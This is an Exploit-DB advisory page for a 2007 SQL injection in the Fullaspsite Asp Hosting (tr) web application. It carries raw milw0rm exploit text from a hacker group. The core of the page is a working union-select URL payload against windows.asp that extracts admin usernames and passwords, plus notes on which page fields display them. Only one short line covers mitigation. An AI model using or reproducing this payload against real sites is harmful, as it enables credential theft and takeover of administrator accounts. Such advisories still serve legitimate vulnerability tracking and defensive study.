Fullaspsite Asp Hosting (tr) SQL Injection Vulnerability

vendor:

Asp Hosting (tr)

by:

cl24zy, DrEgHoT, TuF4N

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Asp Hosting (tr)

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

Fullaspsite Asp Hosting (tr) SQL Injection Vulnerability

The Fullaspsite Asp Hosting (tr) website is vulnerable to SQL injection. An attacker can exploit this vulnerability to retrieve sensitive information such as admin usernames and passwords.

Mitigation:

To mitigate this vulnerability, the website should implement proper input validation and parameterized queries to prevent SQL injection attacks.

Source

Exploit-DB raw data:

###############################################################
#Fullaspsite Asp Hosting (tr) == SQL Injection Vulnerability
#Author : cl24zy - DrEgHoT - TuF4N
#Site : www.hacklive.org , www.illegal-attack.org
#Contact: admin@hacklive.org
###############################################################
#Download Link Of Fullaspsite Asp Hosting Sitesi (tr) :
http://www.aspindir.com/Goster/4383
#Demo : http://aspsiteler.fullaspsite.com/hosting

#Exploit;
#Admin Nick, Passport;
http://[SITE]/windows.asp?kategori_id=-1%20union+all+select+0,1,2,3,4,5,6,7,8,9,10,username,12,13,14,password,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+admin


#Union data Text;
#Alt Domain : Admin UserName
#Anl.k Trafik : Admin Password

#Greetz: iLLeGaL-ATTaCK//TiM & HacKLivETeaM
################################################################

# milw0rm.com [2007-01-31]